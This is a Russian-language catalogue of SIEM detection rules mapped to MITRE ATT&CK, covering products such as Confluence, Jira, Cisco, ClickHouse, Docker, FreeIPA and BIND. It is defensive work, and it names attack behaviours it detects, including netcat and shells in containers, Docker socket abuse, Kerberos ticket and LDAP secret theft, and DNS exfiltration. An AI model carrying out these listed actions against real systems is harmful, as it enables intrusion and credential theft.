Перечень правил детектирования

Данная таблица содержит список разработанных правил детектирования. Для каждого правила указано, к какой информационной системе оно относится, а также какие тактики и техники MITRE ATT&CK оно затрагивает.

Вендор	Продукт	ID правила детектирования	Название правила детектирования	Тактика MITRE ATT&CK	Техника, сабтехника MITRE ATT&CK	Источник события
Все вендоры	-	RV-D-740	Обнаружен индикатор компрометации	TA0001 (Initial Access), TA0011 (Command and Control), TA0010 (Exfiltration)	T1041 (Exfiltration Over C2 Channel), T1071 (Application Layer Protocol), T1071.001 (Application Layer Protocol: Web Protocols), T1071.004 (Application Layer Protocol: DNS), T1105 (Ingress Tool Transfer), T1204 (User Execution), T1204.001 (User Execution: Malicious Link), T1219 (Remote Access Tools), T1566 (Phishing), T1566.001 (Phishing: Spearphishing Attachment), T1566.002 (Phishing: Spearphishing Link), T1566.003 (Phishing: Spearphishing via Service)	-
Гарда	Гарда WAF	RV-D-701	Подбор пароля пользователя к Garda WAF	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing), T1110.003 (Brute Force: Password Spraying)	Гарда WAF
Гарда	Гарда WAF	RV-D-702	Атака Password Spraying к Garda WAF	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing), T1110.003 (Brute Force: Password Spraying)	Гарда WAF
Гарда	Гарда WAF	RV-D-703	Успешный подбор пароля к Garda WAF	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing), T1110.003 (Brute Force: Password Spraying)	Гарда WAF
Гарда	Гарда WAF	RV-D-704	Отключение или изменение паттерна Garda WAF	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	Гарда WAF
Гарда	Гарда WAF	RV-D-705	Атака на веб-приложение Garda WAF	TA0001 (Initial Access), TA0003 (Persistence)	T1190 (Exploit Public-Facing Application), T1505 (Server Software Component), T1505.003 (Server Software Component: Web Shell)	Гарда WAF
Гарда	Гарда WAF	RV-D-706	Множественная атака на веб-приложение Garda WAF	TA0001 (Initial Access), TA0003 (Persistence)	T1190 (Exploit Public-Facing Application), T1505 (Server Software Component), T1505.003 (Server Software Component: Web Shell)	Гарда WAF
Гарда	Гарда WAF	RV-D-707	Множественные атаки на веб-приложение Garda WAF	TA0001 (Initial Access), TA0003 (Persistence)	T1190 (Exploit Public-Facing Application), T1505 (Server Software Component), T1505.003 (Server Software Component: Web Shell)	Гарда WAF
Гарда	Гарда WAF	RV-D-708	Добавление пользователю критичной роли Garda WAF	TA0003 (Persistence)	T1098 (Account Manipulation), T1098.007 (Account Manipulation: Additional Local or Domain Groups)	Гарда WAF
Гарда	Гарда WAF	RV-D-723	Изменение настроек защиты подключенного сервера	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	Гарда WAF
Гарда	Гарда WAF	RV-D-724	Массовое удаление УЗ Garda WAF	TA0040 (Impact)	T1531 (Account Access Removal)	Гарда WAF
Код Безопасности	Континент	RV-D-79	Успешный подбор пароля к серверу Континент TLS	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	-
Код Безопасности	Континент	RV-D-80	Подбор пароля к серверу Континент TLS	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	-
Код Безопасности	Континент	RV-D-81	Подбор пароля Континент методом Password Spraying	TA0006 (Credential Access)	T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)	-
Код Безопасности	Континент	RV-D-82	Вход привилегированного пользователя на устройство Континент с неизвестного хоста	TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access)	T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)	-
Код Безопасности	Secret Net Studio	RV-D-496	Очищен журнал событий Secret Net Studio	TA0005 (Defense Evasion)	T1070 (Indicator Removal), T1070.009 (Indicator Removal: Clear Persistence)	SNS audit events
Код Безопасности	Secret Net Studio	RV-D-497	Вход пользователя из черного списка	TA0001 (Initial Access), TA0005 (Defense Evasion)	T1078 (Valid Accounts)	SNS audit events
Код Безопасности	Secret Net Studio	RV-D-498	Нарушение целостности объекта системы	TA0040 (Impact)	T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)	SNS audit events
Код Безопасности	Secret Net Studio	RV-D-499	Массовая разблокировка узлов Secret Net Studio	TA0005 (Defense Evasion)	T1211 (Exploitation for Defense Evasion)	SNS audit events
Код Безопасности	Secret Net Studio	RV-D-500	Массовая блокировка узлов Secret Net Studio	TA0040 (Impact)	T1499 (Endpoint Denial of Service)	SNS audit events
Код Безопасности	Secret Net Studio	RV-D-501	Изменение политики безопасности Secret Net Studio	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	SNS audit events
Код Безопасности	Secret Net Studio	RV-D-502	Многократная смена пароля учетной записи	TA0003 (Persistence), TA0040 (Impact)	T1098 (Account Manipulation), T1531 (Account Access Removal)	SNS audit events
Код Безопасности	Secret Net Studio	RV-D-503	Изменение правил межсетевого экрана в Secret Net Studio	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.004 (Impair Defenses: Disable or Modify System Firewall)	SNS audit events
Код Безопасности	Secret Net Studio	RV-D-504	Изменение критически важной учетной записи	TA0040 (Impact)	T1098 (Account Manipulation), T1531 (Account Access Removal)	SNS audit events
Код Безопасности	Secret Net Studio	RV-D-505	Отключение защитного механизма в Secret Net Studio	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	SNS audit events
Код Безопасности	Secret Net Studio	RV-D-506	Отключение механизма самозащиты в Secret Net Studio	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	SNS audit events
Код Безопасности	Secret Net Studio	RV-D-507	Подключено съемное устройство к компьютеру	TA0009 (Collection)	T1025 (Data from Removable Media)	SNS audit events
С-Терра СиЭсПи	С-Терра Шлюз	RV-D-520	Изменен пароль для привилегированного режима	TA0003 (Persistence)	T1098 (Account Manipulation)	-
С-Терра СиЭсПи	С-Терра Шлюз	RV-D-521	Создан пользователь на S-Terra Gate	TA0003 (Persistence)	T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account)	-
С-Терра СиЭсПи	С-Терра Шлюз	RV-D-522	Вход в привилегированный режим на S-Terra Gate	TA0004 (Privilege Escalation), TA0003 (Persistence)	T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)	-
С-Терра СиЭсПи	С-Терра Шлюз	RV-D-523	Очищен файл конфигурации на S-Terra Gate	TA0005 (Defense Evasion)	T1070 (Indicator Removal), T1070.007 (Indicator Removal: Clear Network Connection History and Configurations)	-
С-Терра СиЭсПи	С-Терра Шлюз	RV-D-524	Подбор пароля для привилегированного режима	TA0006 (Credential Access)	T1110 (Brute Force)	-
С-Терра СиЭсПи	С-Терра Шлюз	RV-D-525	Настроена отправка логов на неизвестный узел	TA0002 (Execution)	T1059 (Command and Scripting Interpreter), T1059.008 (Command and Scripting Interpreter: Network Device CLI)	-
С-Терра СиЭсПи	С-Терра Шлюз	RV-D-526	Выдача максимальных привилегий для пользователя	TA0004 (Privilege Escalation)	T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts), T1098 (Account Manipulation), T1548 (Abuse Elevation Control Mechanism)	-
С-Терра СиЭсПи	С-Терра Шлюз	RV-D-527	Удален файл на S-Terra Gate	TA0040 (Impact)	T1485 (Data Destruction), T1136.001 (Create Account: Local Account), T1485.001 (Data Destruction: Lifecycle-Triggered Deletion)	-
С-Терра СиЭсПи	С-Терра Шлюз	RV-D-528	Отключена отправка событий на S-Terra Gate	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	-
Солар	Solar webProxy	RV-D-199	Множественные неуспешные попытки аутентификации на системе SWP	TA0006 (Credential Access)	T1110 (Brute Force)	-
Солар	Solar webProxy	RV-D-200	Успешный подбор пароля пользователя на Solar Web Proxy	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	-
Солар	Solar webProxy	RV-D-201	Изменены параметры внешних подключений на Solar Web Proxy	TA0005 (Defense Evasion)	T1562 (Impair Defenses)	-
Солар	Solar webProxy	RV-D-202	Изменение правил межсетевого экранирования и доступа в Solar Web Proxy	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools), T1562.004 (Impair Defenses: Disable or Modify System Firewall)	-
Солар	Solar webProxy	RV-D-203	Изменены критичные параметры системы Solar Web Proxy	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	-
Солар	Solar webProxy	RV-D-204	Вход под привилегированной учетной записью с неизвестного IP на сервер SWP	TA0004 (Privilege Escalation)	T1078 (Valid Accounts), T1078.002 (Valid Accounts: Domain Accounts), T1078.003 (Valid Accounts: Local Accounts)	-
Солар	Solar webProxy	RV-D-205	Создан новый пользователь в Solar Web Proxy	TA0003 (Persistence)	T1136 (Create Account), T1136.001 (Create Account: Local Account), T1136.002 (Create Account: Domain Account)	-
Солар	Solar webProxy	RV-D-206	Создание или изменение роли с критичными правами на Solar Web Proxy	TA0003 (Persistence)	T1098 (Account Manipulation)	-
Солар	Solar webProxy	RV-D-207	Изменены параметры учетной записи на Solar Web Proxy	TA0003 (Persistence), TA0004 (Privilege Escalation)	T1098 (Account Manipulation)	-
Atlassian	Confluence	RV-D-24	Выгрузка множества страниц Confluence	TA0009 (Collection)	T1213 (Data from Information Repositories), T1213.001 (Data from Information Repositories: Confluence)	confluence_access.log, access.log
Atlassian	Confluence	RV-D-25	Выгрузка пространства Confluence	TA0009 (Collection)	T1213 (Data from Information Repositories), T1213.001 (Data from Information Repositories: Confluence)	confluence_access.log, access.log
Atlassian	Confluence	RV-D-26	Множественные попытки входа на веб-сервер Confluence	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	confluence_access.log, access.log
Atlassian	Confluence	RV-D-27	Отключение аудита журналов приложения Confluence	TA0005 (Defense Evasion)	T1562 (Impair Defenses)	confluence_access.log, access.log
Atlassian	Confluence	RV-D-28	Эксплуатация уязвимости в Confluence - CVE-2023-22515	TA0004 (Privilege Escalation), TA0001 (Initial Access), TA0002 (Execution)	T1068 (Exploitation for Privilege Escalation), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution)	confluence_access.log, access.log
Atlassian	Confluence	RV-D-29	Эксплуатация уязвимости в Confluence - CVE-2023-22518	TA0004 (Privilege Escalation), TA0001 (Initial Access), TA0002 (Execution)	T1068 (Exploitation for Privilege Escalation), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution)	confluence_access.log, access.log
Atlassian	Confluence	RV-D-30	Эксплуатация уязвимости в Confluence - CVE-2023-22527	TA0004 (Privilege Escalation), TA0001 (Initial Access), TA0002 (Execution)	T1068 (Exploitation for Privilege Escalation), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution)	confluence_access.log, access.log
Atlassian	Confluence	RV-D-31	Выполнение OGNL-инъекции через Java-выражения в Confluence	TA0002 (Execution)	T1203 (Exploitation for Client Execution)	confluence_access.log, access.log
Atlassian	Confluence	RV-D-32	Создание множества страниц Confluence	TA0040 (Impact)	T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation), T1491 (Defacement), T1491.001 (Defacement: Internal Defacement), T1491.002 (Defacement: External Defacement)	confluence_access.log, access.log
Atlassian	Jira	RV-D-70	Создание резервной копии Jira	TA0009 (Collection), TA0040 (Impact)	T1213 (Data from Information Repositories), T1213.001 (Data from Information Repositories: Confluence), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)	-
Atlassian	Jira	RV-D-71	Дамп множества задач в Jira	TA0009 (Collection), TA0040 (Impact)	T1213 (Data from Information Repositories), T1213.001 (Data from Information Repositories: Confluence), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)	-
Atlassian	Jira	RV-D-72	Экспорт множества задач в Jira	TA0009 (Collection), TA0040 (Impact)	T1213 (Data from Information Repositories), T1213.001 (Data from Information Repositories: Confluence), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)	-
Atlassian	Jira	RV-D-73	Множество неудачных попыток входа в Jira	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	-
Atlassian	Jira	RV-D-74	Изменение конфигурации журналов логирования в Jira	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	-
Atlassian	Jira	RV-D-75	Создание множества задач пользователем в Jira	TA0040 (Impact)	T1499 (Endpoint Denial of Service), T1499.003 (Endpoint Denial of Service: Application Exhaustion Flood), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)	-
Atlassian	Jira	RV-D-76	Удаление множества задач пользователем в Jira	TA0040 (Impact)	T1485 (Data Destruction), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)	-
Atlassian	Jira	RV-D-77	Создание пользователя в Jira	TA0003 (Persistence), TA0004 (Privilege Escalation)	T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account)	-
Atlassian	Jira	RV-D-78	Добавление пользователя в критичные группы	TA0003 (Persistence), TA0004 (Privilege Escalation)	T1098 (Account Manipulation), T1098.007 (Account Manipulation: Additional Local or Domain Groups)	-
Atlassian	Jira	RV-D-482	Эксплуатация уязвимости в Jira - CVE-2023-26256	TA0007 (Discovery), TA0001 (Initial Access), TA0005 (Defense Evasion), TA0006 (Credential Access), TA0009 (Collection)	T1083 (File and Directory Discovery), T1190 (Exploit Public-Facing Application), T1211 (Exploitation for Defense Evasion), T1212 (Exploitation for Credential Access), T1213 (Data from Information Repositories), T1213.001 (Data from Information Repositories: Confluence), T1552 (Unsecured Credentials), T1552.008 (Unsecured Credentials: Chat Messages)	-
Cisco	ASA	RV-D-5	Успешный подбор пароля в привилегированный режим Cisco ASA	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	Syslog (EventID_308001, EventID_502103)
Cisco	ASA	RV-D-6	Подбор пароля через SSH к Cisco ASA	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing), T1110.003 (Brute Force: Password Spraying)	Syslog (EventID_113015)
Cisco	ASA	RV-D-7	Успешный подбор пароля через SSH к Cisco ASA	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	Syslog (EventID_113012, EventID_113015)
Cisco	ASA	RV-D-8	Доступ к привилегированному режиму после авторизации	TA0004 (Privilege Escalation)	T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)	Syslog (EventID_113012, EventID_502103)
Cisco	IOS	RV-D-1	Подбор пароля к устройству на Cisco IOS методом Password Spraying	TA0006 (Credential Access)	T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)	Syslog (Login failed)
Cisco	IOS	RV-D-2	Успешный подбор пароля к устройству c ОС Cisco IOS	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	Syslog (Login failed, Login success)
Cisco	IOS	RV-D-3	Подбор пароля к устройству c ОС Cisco IOS	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	Syslog (Login failed)
Cisco	IOS	RV-D-4	Вход привилегированного пользователя на устройство c ОС Cisco IOS с неизвестного хоста	TA0006 (Credential Access), TA0001 (Initial Access)	T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts), T1078.002 (Valid Accounts: Domain Accounts), T1078.003 (Valid Accounts: Local Accounts)	Syslog (Login success)
ClickHouse	ClickHouse	RV-D-9	Использование LIKE для разведки в Clickhouse	TA0009 (Collection)	T1005 (Data from Local System)	-
ClickHouse	ClickHouse	RV-D-10	Подбор пароля к СУБД ClickHouse	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	-
ClickHouse	ClickHouse	RV-D-11	Изменение конфигурации базы данных ClickHouse	TA0003 (Persistence), TA0005 (Defense Evasion), TA0007 (Discovery), TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1087 (Account Discovery), T1556 (Modify Authentication Process), T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	-
ClickHouse	ClickHouse	RV-D-12	Небезопасный способ аутентификации пользователя ClickHouse	TA0003 (Persistence), TA0004 (Privilege Escalation), TA0006 (Credential Access)	T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account), T1552 (Unsecured Credentials)	-
ClickHouse	ClickHouse	RV-D-13	Создание дампа таблиц в ClickHouse	TA0006 (Credential Access), TA0009 (Collection)	T1003 (OS Credential Dumping), T1005 (Data from Local System), T1074 (Data Staged), T1074.001 (Data Staged: Local Data Staging)	-
ClickHouse	ClickHouse	RV-D-14	Атака Password Spraying на СУБД ClickHouse	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	-
ClickHouse	ClickHouse	RV-D-15	Вход привилегированного пользователя в базу данных ClickHouse с неизвестного хоста	TA0006 (Credential Access), TA0001 (Initial Access)	T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)	-
ClickHouse	ClickHouse	RV-D-16	Успешный подбор пароля к СУБД ClickHouse	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	-
ClickHouse	ClickHouse	RV-D-17	Изменение или удаление таблицы аудита ClickHouse	TA0005 (Defense Evasion), TA0040 (Impact)	T1070 (Indicator Removal), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)	-
ClickHouse	ClickHouse	RV-D-18	Взаимодействие с файловой системой из БД ClickHouse	TA0002 (Execution), TA0007 (Discovery), TA0040 (Impact)	T1059 (Command and Scripting Interpreter), T1059.006 (Command and Scripting Interpreter: Python), T1083 (File and Directory Discovery), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)	-
ClickHouse	ClickHouse	RV-D-19	Получение информации о системе в ClickHouse	TA0007 (Discovery)	T1082 (System Information Discovery), T1083 (File and Directory Discovery)	-
ClickHouse	ClickHouse	RV-D-20	Получение информации о структуре Clickhouse	TA0006 (Credential Access), TA0007 (Discovery)	T1003 (OS Credential Dumping), T1069 (Permission Groups Discovery), T1069.001 (Permission Groups Discovery: Local Groups), T1082 (System Information Discovery), T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1087.002 (Account Discovery: Domain Account)	-
ClickHouse	ClickHouse	RV-D-21	Попытка удаления базы данных в ClickHouse	TA0040 (Impact)	T1485 (Data Destruction)	-
ClickHouse	ClickHouse	RV-D-22	Попытка удаления нескольких таблиц в ClickHouse	TA0040 (Impact)	T1485 (Data Destruction)	-
ClickHouse	ClickHouse	RV-D-23	Создание привилегированного пользователя в ClickHouse	TA0003 (Persistence), TA0004 (Privilege Escalation)	T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account)	-
Docker	Docker Desktop	RV-D-33	Использование debugs в контейнере	TA0004 (Privilege Escalation)	T1611 (Escape to Host)	R-Point
Docker	Docker Desktop	RV-D-34	Вызов процесса netcat в контейнере	TA0002 (Execution), TA0004 (Privilege Escalation)	T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1611 (Escape to Host)	R-Point
Docker	Docker Desktop	RV-D-35	Вызов процесса из /dev/shm в контейнере	TA0004 (Privilege Escalation)	T1611 (Escape to Host)	R-Point
Docker	Docker Desktop	RV-D-36	Вызов интерактивного шелла в контейнере	TA0004 (Privilege Escalation)	T1611 (Escape to Host)	R-Point
Docker	Docker Desktop	RV-D-37	Вызов kubectl в контейнере	TA0004 (Privilege Escalation)	T1609 (Container Administration Command), T1611 (Escape to Host)	R-Point
Docker	Docker Desktop	RV-D-38	Вызов mknod в контейнере	TA0004 (Privilege Escalation)	T1611 (Escape to Host)	R-Point
Docker	Docker Desktop	RV-D-39	Вызов mount в контейнере	TA0004 (Privilege Escalation)	T1611 (Escape to Host)	R-Point
Docker	Docker Desktop	RV-D-40	Обращение к сокет-файлу Docker из контейнера	TA0004 (Privilege Escalation)	T1611 (Escape to Host)	R-Point
Docker	Docker Desktop	RV-D-41	Доступ к release_agent из контейнера	TA0004 (Privilege Escalation)	T1611 (Escape to Host)	R-Point
Docker	Docker Desktop	RV-D-42	Попытка эксплуатации уязвимости runc	TA0004 (Privilege Escalation)	T1611 (Escape to Host)	R-Point
Eltex	vESR	RV-D-43	Подбор пароля к маршрутизатору Eltex vESR методом Password Spraying	TA0006 (Credential Access)	T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)	-
Eltex	vESR	RV-D-44	Успешный подбор пароля к маршрутизатору Eltex vESR	TA0006 (Credential Access)	T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)	-
Eltex	vESR	RV-D-45	Подбор пароля к маршрутизатору Eltex vESR	TA0006 (Credential Access)	T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)	-
Eltex	vESR	RV-D-46	Вход привилегированного пользователя на маршрутизатор Eltex vESR с неизвестного хоста	TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access)	T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)	-
FreeIPA	FreeIPA	RV-D-47	Чтение Ticket CCACHE файла	TA0006 (Credential Access)	T1558 (Steal or Forge Kerberos Tickets), T1558.005 (Steal or Forge Kerberos Tickets: Ccache Files)	Auditd
FreeIPA	FreeIPA	RV-D-48	Атака Golden Ticket FreeIPA	TA0006 (Credential Access)	T1558 (Steal or Forge Kerberos Tickets), T1558.001 (Steal or Forge Kerberos Tickets: Golden Ticket)	Auditd
FreeIPA	FreeIPA	RV-D-49	Выполнение бэкапа FreeIPA	TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.006 (OS Credential Dumping: DCSync)	Auditd
FreeIPA	FreeIPA	RV-D-50	Успешный подбор пароля пользователя FreeIPA	TA0006 (Credential Access)	T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)	KRB5KDC
FreeIPA	FreeIPA	RV-D-51	Чтение LDAP-секретов FreeIPA	TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.006 (OS Credential Dumping: DCSync)	Auditd
FreeIPA	FreeIPA	RV-D-52	Атака Silver Ticket FreeIPA	TA0006 (Credential Access)	T1558 (Steal or Forge Kerberos Tickets), T1558.002 (Steal or Forge Kerberos Tickets: Silver Ticket), T1558.005 (Steal or Forge Kerberos Tickets: Ccache Files)	Auditd
FreeIPA	FreeIPA	RV-D-53	Подбор пароля пользователя FreeIPA	TA0006 (Credential Access)	T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)	KRB5KDC
FreeIPA	FreeIPA	RV-D-54	Использование утилиты kadmin	TA0003 (Persistence)	T1003 (OS Credential Dumping), T1098 (Account Manipulation), T1134 (Access Token Manipulation), T1543 (Create or Modify System Process)	Auditd
FreeIPA	FreeIPA	RV-D-55	Разведка пользователей/ролей IPA	TA0007 (Discovery)	T1087 (Account Discovery), T1087.002 (Account Discovery: Domain Account)	error_log
FreeIPA	FreeIPA	RV-D-56	Изменение оболочки входа средствами FreeIPA	TA0002 (Execution)	T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell)	error_log
FreeIPA	FreeIPA	RV-D-57	Остановка/перезапуск сервисов FreeIPA	TA0040 (Impact)	T1489 (Service Stop)	Auditd
FreeIPA	FreeIPA	RV-D-58	Изменение конфигураций FreeIPA через API	TA0003 (Persistence)	T1556 (Modify Authentication Process), T1556.001 (Modify Authentication Process: Domain Controller Authentication)	error_log
FreeIPA	FreeIPA	RV-D-59	Изменение файлов управления FreeIPA	TA0003 (Persistence)	T1036 (Masquerading), T1574 (Hijack Execution Flow)	Auditd
FreeIPA	FreeIPA	RV-D-60	Изменение конфигураций разрешений в FreeIPA	TA0003 (Persistence)	T1098 (Account Manipulation), T1556 (Modify Authentication Process), T1556.001 (Modify Authentication Process: Domain Controller Authentication)	error_log
FreeIPA	FreeIPA	RV-D-61	Изменение конфигураций привилегий в FreeIPA	TA0003 (Persistence)	T1098 (Account Manipulation), T1556 (Modify Authentication Process), T1556.001 (Modify Authentication Process: Domain Controller Authentication)	error_log
FreeIPA	FreeIPA	RV-D-62	Изменение конфигураций ролей в FreeIPA	TA0003 (Persistence)	T1098 (Account Manipulation)	error_log
FreeIPA	FreeIPA	RV-D-63	Изменение конфигурации сервера FreeIPA	TA0003 (Persistence)	T1003 (OS Credential Dumping), T1136 (Create Account), T1136.002 (Create Account: Domain Account), T1556 (Modify Authentication Process), T1556.001 (Modify Authentication Process: Domain Controller Authentication)	Auditd
FreeIPA	FreeIPA	RV-D-64	Изменение конфигурации сервера kerberos	TA0003 (Persistence)	T1556 (Modify Authentication Process), T1556.001 (Modify Authentication Process: Domain Controller Authentication)	Auditd
FreeIPA	FreeIPA	RV-D-65	Изменение конфигурации сервера ldap	TA0003 (Persistence)	T1556 (Modify Authentication Process), T1556.001 (Modify Authentication Process: Domain Controller Authentication), T1558 (Steal or Forge Kerberos Tickets)	Auditd
FreeIPA	FreeIPA	RV-D-66	Изменение конфигурации sudo в FreeIPA	TA0004 (Privilege Escalation)	T1548 (Abuse Elevation Control Mechanism), T1548.003 (Abuse Elevation Control Mechanism: Sudo and Sudo Caching)	error_log
FreeIPA	FreeIPA	RV-D-67	Добавление HBAC-правила через FreeIPA	TA0004 (Privilege Escalation)	T1098 (Account Manipulation)	error_log
GitHub	GitHub	RV-D-68	Эксплуатация уязвимости в GitHub Enterprise Server - CVE-2024-0507	TA0002 (Execution), TA0004 (Privilege Escalation)	T1068 (Exploitation for Privilege Escalation), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution)	haproxy.log, access.log
InfoWatch	Traffic Monitor	RV-D-609	Атака Brute Force к InfoWatch TM	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	arc_view_audit_log
InfoWatch	Traffic Monitor	RV-D-610	Отключение политики аудита InfoWatch TM	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	arc_view_audit_log
InfoWatch	Traffic Monitor	RV-D-611	Массовое удаление УЗ InfoWatch TM	TA0040 (Impact)	T1531 (Account Access Removal)	arc_view_audit_log
InfoWatch	Traffic Monitor	RV-D-612	Создание администратора в InfoWatch TM	TA0003 (Persistence)	T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts), T1078.003 (Valid Accounts: Local Accounts), T1136 (Create Account), T1136.001 (Create Account: Local Account)	arc_view_audit_log
InfoWatch	Traffic Monitor	RV-D-613	Создание роли администратора в InfoWatch TM	TA0003 (Persistence)	T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts), T1078.003 (Valid Accounts: Local Accounts), T1098 (Account Manipulation)	arc_view_audit_log
InfoWatch	Traffic Monitor	RV-D-614	Успешная атака Brute Force к InfoWatch TM	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	arc_view_audit_log
InfoWatch	Traffic Monitor	RV-D-615	Password Spraying в InfoWatch TM	TA0006 (Credential Access)	T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)	arc_view_audit_log
InfoWatch	Traffic Monitor	RV-D-616	Вход администратора на InfoWatch TM	TA0001 (Initial Access)	T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts), T1078.002 (Valid Accounts: Domain Accounts), T1078.003 (Valid Accounts: Local Accounts)	arc_view_audit_log
Internet Systems Consortium	BIND	RV-D-636	Множественные DNS-запросы с одного устройства	TA0010 (Exfiltration)	T1048 (Exfiltration Over Alternative Protocol), T1048.003 (Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol), T1071 (Application Layer Protocol), T1071.004 (Application Layer Protocol: DNS)	queries.log
Internet Systems Consortium	BIND	RV-D-638	Обнаружен DNS-запрос к ресурсам Telegram API	TA0011 (Command and Control), TA0010 (Exfiltration)	T1048 (Exfiltration Over Alternative Protocol), T1048.003 (Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol), T1071 (Application Layer Protocol), T1071.004 (Application Layer Protocol: DNS), T1102 (Web Service), T1102.002 (Web Service: Bidirectional Communication)	queries.log
Internet Systems Consortium	BIND	RV-D-639	Обнаружен DNS-запрос к пулам Monero	TA0040 (Impact)	T1496 (Resource Hijacking), T1496.001 (Resource Hijacking: Compute Hijacking)	queries.log
Internet Systems Consortium	BIND	RV-D-640	Обнаружен DNS-запрос к подозрительным внешним службам	TA0001 (Initial Access), TA0043 (Reconnaissance)	T1190 (Exploit Public-Facing Application), T1595 (Active Scanning), T1595.002 (Active Scanning: Vulnerability Scanning)	queries.log
Internet Systems Consortium	BIND	RV-D-643	Передача зоны DNS на недоверенный узел (AXFR)	TA0043 (Reconnaissance)	T1590 (Gather Victim Network Information), T1590.002 (Gather Victim Network Information: DNS)	default.log
Internet Systems Consortium	BIND	RV-D-644	Обнаружен DNS-запрос к Killswitch-домену WannaCry	TA0002 (Execution)	T1204 (User Execution), T1204.002 (User Execution: Malicious File)	queries.log
